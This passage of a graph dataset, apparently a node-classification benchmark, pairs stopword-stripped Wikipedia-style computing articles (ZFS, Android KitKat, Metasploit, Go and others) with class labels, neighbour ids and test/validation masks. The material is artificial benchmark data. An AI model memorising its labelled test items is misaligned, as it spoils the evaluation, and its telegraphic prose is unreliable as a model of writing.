proponent open source software opensolaris sun wanted build developer user community around software solaris 10 6/06 u2 sun added zfs file system next 5 years 2006 2010 sun frequently updated zfs new features zfs ported linux mac os x continued maczfs freebsd open source license name one point said stand zettabyte file system 2006 longer considered abbreviation zfs file system store 256 quadrillion zettabytes zb september 2007 netapp sued sun claiming zfs infringed netapp patents write anywhere file layout sun counter-sued october year claiming opposite lawsuits ended 2010 undisclosed settlement fsf claimed cddl gpl legal incompatibility 2005 sun implementation zfs file system n't used basis development linux kernel module n't merged linux kernel mainline linux distributions include precompiled kernel module workaround fuse framework allows file systems run userspace used linux separation layer licensing issues effect although set issues include performance penalty however april 2016 release ubuntu 16.04 lts includes cddl-licensed zfs linux kernel module maintained separate project outside linux kernel mainline claiming license compatibility january 2010 oracle corporation acquired sun microsystems quickly discontinued opensolaris distribution open source development model august 2010 oracle discontinued providing public updates source code solaris kernel effectively turning solaris 11 back closed source proprietary operating system response changing landscape solaris opensolaris illumos project launched via webinar thursday 3 august 2010 community effort core solaris engineers continue developing open source version solaris complete open sourcing parts already open sourced sun illumos founded foundation illumos foundation incorporated state california 501 c 6 trade association original plan explicitly stated illumos would distribution fork however oracle announced discontinuing opensolaris plans made fork final version solaris kernel allowing illumos evolve kernel part opensolaris open source version zfs therefore integral within illumos zfs widely used within numerous platforms well solaris therefore 2013 co-ordination development work open source version zfs passed umbrella project openzfs openzfs framework allows interested parties collaboratively develop core zfs codebase common individually maintaining specific extra code zfs requires function integrate within systems following list open-source zfs ports forks note solaris version development sun since release solaris 10 2005 codenamed 'nevada derived opensolaris codebase 'solaris nevada codename next-generation solaris os eventually succeed solaris 10 new code pulled successively new opensolaris 'nevada snapshot builds opensolaris discontinued openindiana forked final build b134 opensolaris published oracle 2010-nov-12 upgrade path solaris 11 express openzfs pool version permanently set 5000 signifying pool indicates new features setting unsetting zfs feature flags rather incrementing pool version number 5000 chosen expected never conflict version numbers given oracle legacy version numbers still exist pool versions 1–28 future on-disk format changes enabled disabled independently via feature flags",
    "neighbors": [
      3969,
      6787,
      5380,
      394,
      10643,
      5397,
      10016,
      6049,
      7983,
      2995,
      823,
      9151,
      9665,
      10436,
      8262,
      11363,
      5093,
      5356,
      5492,
      1399,
      890,
      8700,
      2045,
      9343
    ],
    "mask": "None"
  },
  {
    "node_id": 1423,
    "label": 7,
    "text": "Plex_Systems:plex systems plex systems inc. software company based troy michigan company develops markets plex manufacturing cloud software service saas cloud computing erp manufacturing plex systems began internal project automotive parts manufacturer msp industries corporation 1989 company formed plexus systems llc 1995 providing client/server manufacturing software company began offering software via software service saas cloud computing model plexus online launched 2001 2006 apax partners acquired majority interest company 2009 company changed name plex systems renamed flagship product plex online june 2012 company announced acquisition group share holders including apax partners francisco partners june 2012 accel partners invested 30 million plex june 2014 plex secured 50 million additional funding led t. rowe price joined existing investors francisco partners accel partners aberdeen group suggested aberdeen axis erp manufacturing 2009 ” report plex systems among top four performing erp vendors plex erp software solution provider placed entirely within “ champion ” performance category ahead sap ag evidence plex acting sponsor aberdeen group report aberdeen may biased however vendors evaluated report also sponsors aberdeen group historically company released detailed financial information citing status privately held corporation however may 2012 company reported revenue increase 30.6 first quarter ending march 31 compared year earlier recurring revenue increased 30.5 percent representing 19th consecutive quarter growth plex known first provider complete saas erp solution manufacturing companies several software bloggers written plex ’ ability provide wide scope critical features manufacturers saas model larger erp vendors succeeded time 2014 firm raised 50 million funding support expanded product development well investments marketing sales plex manufacturing cloud software service saas cloud application erp manages manufacturing process supports functions production inventory shipping supply-chain management quality accounting sales human resource departments addition traditional erp roles finance/accounting procurement human capital management etc plex targeted towards manufacturing industries rigorous traceability quality food safety requirements including automotive aerospace food beverage life sciences medical manufacturing system must accessed using web browser making functions available anywhere internet connection software designed provide managers engineers real-time visibility production data plex systems calls saas solution erp software also includes following integrated functions plex manufacturing cloud built multi-tenant architecture software service saas also referred cloud application application delivery model user accesses software internet anywhere time physical location ownership/maintenance burden system actually serves software outside responsibility concern end users professionals expressed concern moving erp saas model time many companies successfully performed deployments plex systems providers saas applications deployed atop platform layer cloud computing stack applications tend sold subscription shifting burden software cost across useful life software tend accounted operating expense opex contrast traditional methods require upfront payment financing tend accounted capital expense capex",
    "neighbors": [
      4194,
      467,
      5210
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1424,
    "label": 2,
    "text": "Nokia_N91:nokia n91 nokia n91 smartphone produced nokia part nseries line portable devices announced april 27 2005 along n70 n90 first three nseries devices.. n91 ran symbian-based s60 3rd edition first run symbian 9.1 first ever phone encompassing 4 gb internal hard drive allowing storage 3,000 songs 8 gb revision came later n91 highly focused music dedicated music keys front slide reveal keypad also featured industry-standard 3.5 mm headphone jack anticipated major challenger apple whose ipod dominated industry design n91 based stainless steel matte finish n91 became one 2005 anticipated phones however suffered long delay release expected begin shipping end 2005 september year device delayed till 2006 february 2006 delayed yet due software issues pushing release q2 finally april 2006 first released consumers full year announcement nevertheless n91 'most innovative product 'most technologically advanced product award recognition true multimedia music experience added together high-end smartphone capabilities advertisements phone nokia recommended bose sennheiser headphones sound output considered many high quality loud features 2-megapixel camera music player playing songs encoded either aac aac+ eaac+ mp3 mp3pro wav midi microsoft wma format generally considered benchmark music department simply unparalleled sound quality headphones also features 3g wi-fi connectivity phone features 176 x 208 262,144 colours tft lcd display dedicated music functionality buttons xpressmusic slide reveal traditional mobile phone keys battery life solely playing music estimated 12 hours n91 first smartphone gigabyte hard drive samsung sgh-i300 announced month n91 first however n91 packed 4 gb compared 3 gb i300 8gb variant n91 8gb internally known n91-2 announced september 26 2006 upgraded model features minor improvements addition extra storage space prominent feature n91-2 apart increased memory inclusion a2dp bluetooth profile profile enabled wireless music playback bluetooth full stereo 2 different channels l+r compatible bluetooth headsets already available market n91 8gb distinct black color added face value breaking record first phone 8gb hard disk n91-5 version n91 4 gb memory without wi-fi wlan 3g network support produced chinese plant nokia model retailed 50 euros less regular n91 n91 praised impeccable reputation best sounding mobile phone ever produced audio reproduction spot comparable high end music systems 'loudness 'stereo widening effects used together provide astonishing tonal clarity dynamic range also considered loudest audio output mobile phone phones followed n91 suffered lower sound output due eu regulation laws notably n81 supposed successor n91 nokia n91 uses special toshiba dac-33 chip set powerful in-built harman kardon amplifier boost volume maintaining acoustics resulting louder deep bass rich sound perfect low mid range slightly damped high range frequency achieved ipod sony walkmans 8 slight damping high frequency boon music listeners wo n't strain ears even prolonged use one standard hand held devices drive high end higher impedance headset considerable volume test conducted n91 wins ipod nano signal noise ratio output power full volume output 10–100 hz although n91 considered benchmark time surpassed modern phones lg v20 lg v30 feature dedicated quad dac sound filters higher audio quality headphones problems n91 namely connecting phone macintosh computer often cause phone crash two units disconnected music files often recognised despite loaded phone hard drive also old firmware versions install new theme reset back default theme users update firmware using nokia pc suite philippines incident involving n91 used one nokia 46 million recalled bl-5c lithium-ion batteries exploded result",
    "neighbors": [
      1537,
      4609,
      8577,
      3205,
      11655,
      9359,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      5201,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1377,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      1776,
      8433,
      1533
    ],
    "mask": "None"
  },
  {
    "node_id": 1425,
    "label": 3,
    "text": "KOMDIV-64:komdiv-64 komdiv-64 family 64-bit microprocessors developed scientific research institute system development niisi russian academy sciences manufactured tsmc umc globalfoundries x-fab komdiv-64 processors intended primarily industrial high-performance computing applications microprocessors implement mips iv instruction set architecture isa",
    "neighbors": [
      6659,
      9861,
      7687,
      6815,
      4386,
      426,
      6957,
      8625,
      2490,
      11580,
      6207,
      7234,
      2503,
      2523,
      9309,
      5348,
      5358,
      1776,
      499,
      1399
    ],
    "mask": "None"
  },
  {
    "node_id": 1426,
    "label": 2,
    "text": "Toor_(Unix):toor unix toor word root spelled backwards alternative superuser account unix-like operating systems particularly bsd variants unix traditional keep root filesystem small reasonably possible moving larger programs rapidly changing data optional parts system increases likelihood system brought semi-usable state case partial system failure also means superuser account necessary repairing broken system depend programs outside small core end root account often configured shell small efficient dependable awkward daily use toor account intended solution problem identical root configured use different featureful shell alternately toor may configured emergency shell allowing root freedom use featureful one unix-like system user user id number kernel uses distinguish users manage user permissions user id 0 reserved superuser account given permission anything system users log username id number user choice login shell also managed name separation name number allows given user id associated one username shell presence 'toor account presence one account user id 0 triggers warning many security auditing systems valuable since system administrator intend second superuser account may mean system compromised may argued even intentional 'toor account security risk since provides second point attack someone trying illicitly gain superuser privileges system however passwords chosen guarded carefully risk increase minimal example netbsd ships disabled 'toor account meaning password one log system 'toor security risk though may generate security warnings previously described however system compromised administrator may less likely notice enabling disabled account creation new one especially become accustomed ignoring warnings 'toor arguably misconfigured security program",
    "neighbors": [
      9762,
      1509,
      5397,
      700,
      7325
    ],
    "mask": "None"
  },
  {
    "node_id": 1427,
    "label": 2,
    "text": "Android_KitKat:android kitkat android kitkat codename android mobile operating system eleventh version android unveiled september 3 2013 kitkat focused primarily optimizing operating system improved performance entry-level devices limited resources statistics issued google indicate 6.9 android devices accessing google play run kitkat android 4.4 kitkat officially announced september 3 2013 release internally codenamed key lime pie john lagerling director android global partnerships team decided drop name arguing people actually know taste key lime pie aiming codename fun unexpected team pursued possibility naming release kitkat instead lagerling phoned representative nestlé owns kit kat brand produces confectionary outside united states produced hershey company license quickly reached preliminary deal promotional collaboration two companies later finalized meeting mobile world congress february 2013 partnership revealed publicly even google employees android developers otherwise continued internally refer os klp official announcement september part promotional efforts kit kat bars shape android robot logo produced hershey ran contest united states prizes nexus 7 tablets google play store credit nexus 5 developed lg electronics unveiled september 30 2013 launch device kitkat october 2017 android 4.4 still supported security patches google source code continuing focus improving visual performance responsiveness android 4.1 jelly bean main objective android 4.4 optimize platform better performance low-end devices without compromising overall capabilities functionality initiative codenamed project svelte android head engineering dave burke joked weight loss plan jelly bean project butter added weight os simulate lower-spec devices android developers used nexus 4 devices underclocked run reduced cpu speed single core active 512 mb memory 960×540 display resolution—specifications meant represent common low-end android device development tool known procstats developed order analyze memory usage apps time especially run background services data used optimize decouple google apps services found inefficient thus helping reduce overall memory usage android additionally 4.4 designed aggressive managing memory helping guard apps wasting much memory overall interface kitkat downplays holo interface appearance introduced 4.0 replacing remaining instances blue accenting greys white status bar icons apps may trigger translucent status navigation bar appearance trigger full screen mode immersive mode hide entirely launcher also received refreshed appearance implementation translucent navigation bars replacement black backdrop application drawer translucent backdrop additionally action overflow menu buttons apps always visible even devices deprecated menu navigation key settings menu users specify default home launcher text messaging app stock devices messaging movie studio apps removed former replaced google hangouts supported sms aosp gallery app also deprecated favor google+ photos new runtime environment known android runtime art intended replace dalvik virtual machine introduced technology preview kitkat art cross-platform runtime supports x86 arm mips architectures 32-bit 64-bit environments unlike dalvik uses just-in-time compilation jit art compiles apps upon installation run exclusively compiled version technique removes processing overhead associated jit process improving system performance devices 512 mb ram less report low ram devices using api apps may detect low ram devices modify functionality accordingly kitkat also supports zram webview components updated utilize version google chrome rendering engine new storage access framework api allows apps retrieve files consistent manner part framework new system file picker branded documents allows users access files various sources including exposed apps online storage services public api introduced developing managing text messaging clients sensor batching step detection counter apis also added kitkat supports host card emulation near-field communications allows apps emulate smart card activities mobile payments",
    "neighbors": [
      10755,
      5637,
      8719,
      3600,
      9745,
      7700,
      9244,
      11294,
      1578,
      10284,
      5677,
      10293,
      1083,
      7234,
      6212,
      69,
      8262,
      4683,
      4685,
      11343,
      3664,
      8280,
      8285,
      2658,
      1134,
      8821,
      11391,
      1670,
      7816,
      5262,
      10393,
      8858,
      7835,
      673,
      8870,
      1191,
      1203,
      7359,
      196,
      3269,
      3782,
      8907,
      2259,
      3795,
      1240,
      8413,
      9949,
      6367,
      1255,
      236,
      8940,
      9964,
      9970,
      3836,
      5892,
      7428,
      2828,
      10517,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      4901,
      8486,
      10537,
      2349,
      7983,
      3380,
      5431,
      2875,
      3900,
      10045,
      11590,
      11082,
      332,
      3409,
      8019,
      2901,
      5467,
      3940,
      5483,
      1904,
      7548,
      8573,
      4995,
      9610,
      10129,
      5522,
      5524,
      10645,
      1435,
      8609,
      2978,
      1959,
      424,
      937,
      5546,
      3499,
      6057,
      7595,
      4024,
      2001,
      479,
      6632,
      1516,
      5100,
      5613,
      9712,
      499,
      5620,
      11252,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 1428,
    "label": 3,
    "text": "Apple_A8:apple a8 apple a8 64-bit arm-based system chip soc designed apple inc first appeared iphone 6 iphone 6 plus introduced september 9 2014 apple states 25 cpu performance 50 graphics performance drawing 50 power predecessor apple a7 currently oldest chip supported produced apple ipad mini 4 apple tv 4th generation support ipados tvos 13 respectively a8 manufactured 20 nm process tsmc replaced samsung manufacturer apple mobile device processors contains 2 billion transistors despite twice number transistors a7 a8 physical size reduced 13 89 mm a8 uses lpddr3-1333 ram 64-bit memory interface iphone 6/6 plus sixth generation ipod touch homepod a8 1 gb ram included package a8 ipad mini 4 4th generation apple tv packaged 2 gb ram a8 cpu per-core l1 cache 64 kb data 64 kb instructions l2 cache 1 mb shared cpu cores 4 mb l3 cache services entire soc predecessor 6 decode 6 issue 9 wide out-of-order design processor dual core used iphone 6 frequency 1.4 ghz supporting apple claim 25 faster a7 also supports notion second generation enhanced cyclone core called typhoon entirely new architecture would supposedly mean significant performance gain per hz a8 also integrates graphics processing unit gpu 4-shader-cluster powervr gx6450 october 16 2014 apple introduced variant a8 a8x ipad air 2 compared a8 a8x enhanced 8-shader-cluster gpu improved cpu performance due one extra core higher frequency a8 branch predictor claimed infringe 1998 patent october 14 2015 district judge found apple guilty infringing u.s. patent table based data speculation circuit parallel processing computer apple a7 a8 processors patent owned wisconsin alumni research foundation warf firm affiliated university wisconsin july 24 2017 apple ordered pay warf 506 million patent infringement apple filed appellate brief october 26 2017 u.s. court appeals federal circuit argued apple infringe patent owned wisconsin alumni research foundation september 28 2018 ruling overturned appeal award thrown u.s. federal circuit court appeals patent expired december 2016",
    "neighbors": [
      9732,
      1549,
      7697,
      4114,
      9235,
      11282,
      6165,
      11289,
      7706,
      8222,
      1057,
      2551,
      38,
      6183,
      1576,
      8231,
      4139,
      6700,
      7211,
      8237,
      9774,
      2097,
      9784,
      8250,
      8253,
      576,
      7745,
      1090,
      7747,
      2635,
      8783,
      4180,
      10838,
      10840,
      9312,
      3681,
      9826,
      99,
      8806,
      3691,
      8812,
      6258,
      10357,
      6264,
      10361,
      4220,
      10365,
      2686,
      638,
      6783,
      7806,
      10878,
      644,
      4741,
      8842,
      6283,
      7824,
      146,
      147,
      659,
      7830,
      6807,
      5784,
      7833,
      666,
      4251,
      5786,
      4258,
      7842,
      7844,
      4773,
      171,
      2735,
      3248,
      9913,
      4283,
      7869,
      8893,
      8383,
      8896,
      10945,
      6654,
      4807,
      4810,
      3790,
      1744,
      4821,
      3286,
      3293,
      4318,
      9952,
      2788,
      3301,
      6884,
      231,
      2282,
      1772,
      4844,
      9964,
      1776,
      10481,
      6391,
      3835,
      2814,
      1290,
      3338,
      781,
      6926,
      4879,
      784,
      9999,
      4888,
      8480,
      10023,
      5417,
      2862,
      4399,
      4910,
      7988,
      11062,
      11066,
      6971,
      11257,
      9022,
      1346,
      8003,
      10562,
      6981,
      838,
      5963,
      8525,
      1871,
      1872,
      9042,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      1377,
      9063,
      10602,
      11629,
      10608,
      6001,
      373,
      8058,
      9084,
      7549,
      11649,
      392,
      3977,
      6539,
      398,
      3483,
      4508,
      10658,
      2979,
      5028,
      7077,
      9123,
      9638,
      8109,
      3511,
      2492,
      446,
      7614,
      5058,
      9155,
      10691,
      2502,
      456,
      1482,
      9163,
      7631,
      464,
      6608,
      980,
      9685,
      8662,
      9174,
      10199,
      8665,
      2524,
      9182,
      4068,
      5093,
      2023,
      8170,
      10734,
      5616,
      6130,
      7154,
      1014,
      3575,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 1429,
    "label": 4,
    "text": "Metasploit_Project:metasploit project metasploit project computer security project provides information security vulnerabilities aids penetration testing ids signature development owned boston massachusetts-based security company rapid7 best-known sub-project open-source metasploit framework tool developing executing exploit code remote target machine important sub-projects include opcode database shellcode archive related research metasploit project includes anti-forensic evasion tools built metasploit framework metasploit pre-installed kali linux operating system metasploit created h. d. moore 2003 portable network tool using perl 2007 metasploit framework completely rewritten ruby october 21 2009 metasploit project announced acquired rapid7 security company provides unified vulnerability management solutions like comparable commercial products immunity canvas core security technologies core impact metasploit used test vulnerability computer systems break remote systems like many information security tools metasploit used legitimate unauthorized activities since acquisition metasploit framework rapid7 added two open core proprietary editions called metasploit express metasploit pro metasploit emerging position de facto exploit development framework led release software vulnerability advisories often accompanied third party metasploit exploit module highlights exploitability risk remediation particular bug metasploit 3.0 began include fuzzing tools used discover software vulnerabilities rather exploits known bugs avenue seen integration lorcon wireless 802.11 toolset metasploit 3.0 november 2006 metasploit 4.0 released august 2011 basic steps exploiting system using framework include modular approach – allowing combination exploit payload – major advantage framework facilitates tasks attackers exploit writers payload writers metasploit runs unix including linux mac os x windows metasploit framework extended use add-ons multiple languages choose exploit payload information target system needed operating system version installed network services information gleaned port scanning os fingerprinting tools nmap vulnerability scanners nexpose nessus openvas detect target system vulnerabilities metasploit import vulnerability scanner data compare identified vulnerabilities existing exploit modules accurate exploitation several interfaces metasploit available popular maintained rapid7 strategic cyber llc free version contains command line interface third-party import manual exploitation manual brute forcing free version metasploit project also includes zenmap well known ports-scanner compiler ruby language version metasploit written october 2011 rapid7 released metasploit community edition free web-based user interface metasploit metasploit community based commercial functionality paid-for editions reduced set features including network discovery module browsing manual exploitation metasploit community included main installer april 2010 rapid7 released metasploit express open-core commercial edition security teams need verify vulnerabilities offers graphical user interface integrates nmap discovery adds smart bruteforcing well automated evidence collection october 2010 rapid7 added metasploit pro open-core commercial metasploit edition penetration testers metasploit pro adds onto metasploit express features quick start wizards/metamodules building managing social engineering campaigns web application testing advanced pro console dynamic payloads anti-virus evasion integration nexpose ad-hoc vulnerability scans vpn pivoting armitage graphical cyber attack management tool metasploit project visualizes targets recommends exploits free open source network security tool notable contributions red team collaboration allowing shared sessions data communication single metasploit instance cobalt strike collection threat emulation tools provided strategic cyber llc work metasploit framework cobalt strike includes features armitage adds post-exploitation tools addition report generation features metasploit currently 1894 exploits organized following platforms aix android bsd bsdi cisco firefox freebsd hpux irix java javascript linux mainframe multi applicable multiple platforms netbsd netware nodejs openbsd osx php python r ruby solaris unix windows metasploit currently 547 payloads metasploit framework operates open-source project accepts contributions community github.com pull requests submissions reviewed team consisting rapid7 employees senior external contributors majority contributions add new modules exploits scanners list original developers",
    "neighbors": [
      3714,
      899,
      5636,
      7044,
      3462,
      7556,
      7557,
      8582,
      1803,
      6797,
      3473,
      4373,
      6550,
      9245,
      161,
      675,
      2084,
      7717,
      8488,
      939,
      5677,
      7855,
      7983,
      8497,
      9393,
      2739,
      7989,
      823,
      9146,
      10298,
      6588,
      7228,
      1474,
      2430,
      8644,
      4552,
      5833,
      7369,
      9293,
      1232,
      4945,
      11221,
      2262,
      5078,
      9815,
      8922,
      4956,
      4198,
      7526,
      8554,
      5612,
      8047,
      5492,
      1017,
      5245,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 1430,
    "label": 3,
    "text": "Anticiparallelism:anticiparallelism anticiparallelism anticipatory parallelism term coined bob metcalfe 1998 technique using idle machine cycles perform useful computing tasks background tasks must readily interrupted intervals computer needs return primary task example task transmitting e-mail anticiparalleism also known speculative execution continual computation optimistic execution",
    "neighbors": [
      8815
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1431,
    "label": 6,
    "text": "Devfsd:devfsd devfsd device manager linux kernel primarily creates device nodes /dev directory kernel drivers make underlying hardware accessible nodes exist virtual device file system named devfs systems support many different types hardware device nodes convenient creating possible device nodes beforehand real filesystem devfs step forward several disadvantages since version 2.5 linux kernel devfs succeeded udev devtmpfs",
    "neighbors": [
      3082,
      5139,
      10780,
      10785,
      3618,
      6180,
      8242,
      9266,
      10817,
      6213,
      8268,
      5222,
      10856,
      4734,
      7812,
      8326,
      4238,
      10382,
      2195,
      2711,
      9882,
      1694,
      2723,
      10933,
      5815,
      5822,
      1736,
      2762,
      8909,
      8410,
      10971,
      8928,
      1761,
      2278,
      233,
      4841,
      10482,
      2294,
      8439,
      2809,
      7938,
      4360,
      1813,
      792,
      10016,
      295,
      7983,
      823,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      5975,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      11155,
      9621,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      9646,
      9660,
      457,
      5067,
      8147,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 1432,
    "label": 4,
    "text": "List_of_shibboleths:list shibboleths listed various examples words phrases identified shibboleths word custom whose variations pronunciation style used differentiate members ingroups outgroups every frenchman failed test stabbed spot still nightgown signal uprising matins bells city churches monasteries became known bruges matins brugse metten like name massacre story may influenced sicilian uprising mentioned",
    "neighbors": [
      1249
    ],
    "mask": "Test"
  },
  {
    "node_id": 1433,
    "label": 4,
    "text": "AAA_(computer_security):aaa computer security aaa refers authentication authorization accounting used refer family protocols mediate network access two network protocols providing functionality particularly popular radius protocol newer diameter counterpart explanations authentication authorization accounting available external sites cases term aaa used refer protocol-specific information example diameter uses uri scheme aaa stands authentication authorization accounting diameter-based protocol aaas stands authentication authorization accounting secure transport protocols defined internet engineering task force rfc 6733 intended provide authentication authorization accounting aaa framework applications network access ip mobility local roaming situations term aaa used narrow context concept aaa widely used within industry result incorrect refer aaa diameter one aaa servers cdma data networks entities provide internet protocol ip functionality support functions authentication authorization accounting aaa server cdma wireless data network architecture similar hlr cdma wireless voice network architecture types aaa servers include following current aaa servers communicate using radius protocol tia specifications refer aaa servers radius servers however future aaa servers expected use successor protocol radius known diameter behavior aaa servers radius servers cdma2000 wireless ip network specified tia-835",
    "neighbors": [
      5472,
      10058,
      4843,
      8670
    ],
    "mask": "Test"
  },
  {
    "node_id": 1434,
    "label": 7,
    "text": "STONITH:stonith stonith shoot node head shoot offending node head sometimes called stomith shoot member/machine head technique fencing computer clusters fencing isolation failed node cause disruption computer cluster name suggests stonith fences failed nodes resetting powering failed node multi-node error-prone contention cluster catastrophic results nodes try writing shared storage resource stonith provides effective rather drastic protection problems single node systems use comparable mechanism called watchdog timer watchdog timer reset node node tell watchdog circuit operating well stonith decision based various decisions customer specific plugins",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 1435,
    "label": 9,
    "text": "Go_(programming_language):go programming language go also known golang statically typed compiled programming language designed google robert griesemer rob pike ken thompson go syntactically similar c memory safety garbage collection structural typing csp-style concurrency two major implementations third party transpiler gopherjs compiles go javascript front-end web development go designed google 2007 improve programming productivity era multicore networked machines large codebases designers wanted address criticism languages use google keep useful characteristics designers primarily motivated shared dislike c++ go publicly announced november 2009 version 1.0 released march 2012 go widely used production google many organizations open-source projects november 2016 go go mono fonts sans-serif monospaced respectively released type designers charles bigelow kris holmes designed legible large x-height distinct letterforms conforming din 1450 standard april 2018 original logo replaced stylized go slanting right trailing streamlines however gopher mascot remained august 2018 go principal contributors published two ″draft designs″ new language features generics error handling asked go users submit feedback lack support generic programming verbosity error handling go 1.x drawn considerable criticism go 1 guarantees compatibility language specification major parts standard library versions current go 1.12 release maintained promise major go release supported two newer major releases go influenced c emphasis greater simplicity safety language consists go syntax includes changes c aimed keeping code concise readable combined declaration/initialization operator introduced allows programmer write codice_6 codice_7 without specifying types variables used contrasts c codice_8 codice_9 semicolons still terminate statements implicit end line occurs functions may return multiple values returning codice_10 pair conventional way function indicates error caller go go adds literal syntaxes initializing struct parameters name initializing maps slices alternative c three-statement codice_11 loop go codice_12 expressions allow concise iteration arrays slices strings maps channels go number built-in types including numeric ones etc booleans character strings strings immutable built-in operators keywords rather functions provide concatenation comparison utf-8 encoding/decoding record types defined keyword type non-negative integer constant array type denoted arrays differing lengths thus different types dynamic arrays available slices denoted type length capacity specifying new memory needs allocated expand array several slices may share underlying memory pointers available types pointer-to- type denoted address-taking indirection use operators c happen implicitly method call attribute access syntax pointer arithmetic except via special type standard library pair types type type hash tables mapping type- keys type- values hash tables built language special syntax built-in functions channel allows sending values type concurrent go processes aside support interfaces go type system nominal keyword used define new named type distinct named types layout case members order conversions types e.g. various integer types pre-defined adding new type may define additional conversions conversions named types must always invoked explicitly example keyword used define type ipv4 addresses based 32-bit unsigned integers type ipv4addr uint32 type definition interprets value ip address simply assigning variable type type error constant expressions may either typed untyped given type assigned typed variable value represent passes compile-time check function types indicated keyword take zero parameters return zero values typed parameter return values determine function type thus type functions take 32-bit signed integer return signed integer default width value built-in interface type named type method set associated ip address example extended method checking whether value known standard // zerobroadcast reports whether addr 255.255.255.255. func addr ipv4addr zerobroadcast bool due nominal typing method definition adds method methods special definition call syntax distinct method type go provides two features replace class inheritance first embedding viewed automated form composition delegation second interfaces provides runtime polymorphism interfaces class types provide limited form structural typing otherwise nominal type system go object interface type also another type much like c++ objects simultaneously base derived class go interfaces designed protocols smalltalk programming language multiple sources use term duck typing describing go interfaces although term duck typing precisely defined therefore wrong usually implies type conformance statically checked since conformance go interface checked statically go compiler except performing type assertion go authors prefer term structural typing definition interface type lists required methods name type object type functions exist matching required methods interface type object type well definition type need identify type example defined import math type shape interface type square struct // note implements declaration type circle struct // implements declaration either implicitly assigned -typed variable formal language go interface system provides structural rather nominal typing interfaces embed interfaces effect creating combined interface satisfied exactly types implement embedded interface methods newly defined interface adds go standard library uses interfaces provide genericity several places including input/output system based concepts besides calling methods via interfaces go allows converting interface values types run-time type check language constructs type assertion checks single potential type type switch checks multiple types empty interface codice_13 important base case refer item concrete type similar class java c satisfied type including built-in types like code using empty interface simply call methods built-in operators referred-to object store codice_13 value try convert useful type via type assertion type switch inspect go codice_15 package codice_13 refer value limited way escape restrictions static typing like codice_17 c additional run-time type checks interface values implemented using pointer data second pointer run-time type information like types implemented using pointers go interface values codice_18 uninitialized go package system package path e.g. codice_19 codice_20 name e.g. codice_21 codice_22 references packages definitions must always prefixed package name capitalized names packages accessible codice_23 public codice_24 codice_4 command retrieve packages stored remote repository developers encouraged develop packages inside base path corresponding source repository example.com/user_name/package_name reduce likelihood name collision future additions standard library external libraries proposals exist introduce proper package management solution go similar rust cargo system node npm system go language built-in facilities well library support writing concurrent programs concurrency refers cpu parallelism also asynchrony letting slow operations like database network-read run program work common event-based servers primary concurrency construct goroutine type light-weight process function call prefixed keyword starts function new goroutine language specification specify goroutines implemented current implementations multiplex go process goroutines onto smaller set operating system threads similar scheduling performed erlang standard library package featuring classical concurrency control structures mutex locks etc available idiomatic concurrent programs instead prefer channels provide send messages goroutines optional buffers store messages fifo order allow sending goroutines proceed messages received channels typed channel type used transfer messages type special syntax used operate expression causes executing goroutine block value comes channel sends value possibly blocking another goroutine receives value built-in -like statement used implement non-blocking communication multiple channels see example go memory model describing goroutines must use channels operations safely share data existence channels sets go apart actor model-style concurrent languages like erlang messages addressed directly actors corresponding goroutines actor style simulated go maintaining one-to-one correspondence goroutines channels language allows multiple goroutines share channel single goroutine send receive multiple channels tools one build concurrent constructs like worker pools pipelines say file decompressed parsed downloads background calls timeout fan-out parallel calls set services others channels also found uses usual notion interprocess communication like serving concurrency-safe list recycled buffers implementing coroutines helped inspire name goroutine implementing iterators concurrency-related structural conventions go channels alternative channel inputs derived tony hoare communicating sequential processes model unlike previous concurrent programming languages occam limbo language go co-designer rob pike worked go provide built-in notion safe verifiable concurrency communicating-processes model favored go one goroutines program share single address space means mutable objects pointers shared goroutines see although go concurrency features aimed primarily parallel processing used program shared memory multi-processor machines various studies done effectiveness approach one studies compared size lines code speed programs written seasoned programmer familiar language corrections programs go expert google development team chapel cilk intel tbb study found non-expert tended write divide-and-conquer algorithms one statement per recursion expert wrote distribute-work-synchronize programs using one goroutine per processor expert programs usually faster also longer restrictions goroutines access shared data making race conditions possible specifically unless program explicitly synchronizes via channels means writes one goroutine might partly entirely visible another often guarantees ordering writes furthermore go internal data structures like interface values slice headers hash tables string headers immune race conditions type memory safety violated multithreaded programs modify shared instances types without synchronization instead language support safe concurrent programming thus relies conventions example chisnall recommends idiom called aliases xor mutable meaning passing mutable value pointer channel signals transfer ownership value receiver linker gc toolchain creates statically-linked binaries default therefore go binaries include go runtime go deliberately omits certain features common languages including implementation inheritance generic programming assertions pointer arithmetic implicit type conversions untagged unions tagged unions designers added facilities three agreed omitted language features designers explicitly argue assertions pointer arithmetic defending choice omit type inheritance giving useful language encouraging instead use interfaces achieve dynamic dispatch composition reuse code composition delegation fact largely automated embedding according researchers schmager et al feature many drawbacks inheritance affects public interface objects fine-grained i.e method-level control embedding methods embedded objects hidden static making obvious whether programmers overuse extent programmers languages reputed overuse inheritance designers express openness generic programming note built-in functions fact type-generic treated special cases pike calls weakness may point changed google team built least one compiler experimental go dialect generics release also open standardizing ways apply code generation initially omitted exception-like mechanism eventually added go authors advise using unrecoverable errors halt entire program server request shortcut propagate errors stack within package across package boundaries error returns standard api go authors put substantial effort influencing style go programs main go distribution includes tools building testing analyzing code also includes profiling debugging support runtime instrumentation example track garbage collection pauses race condition tester ecosystem third-party tools adds standard distribution 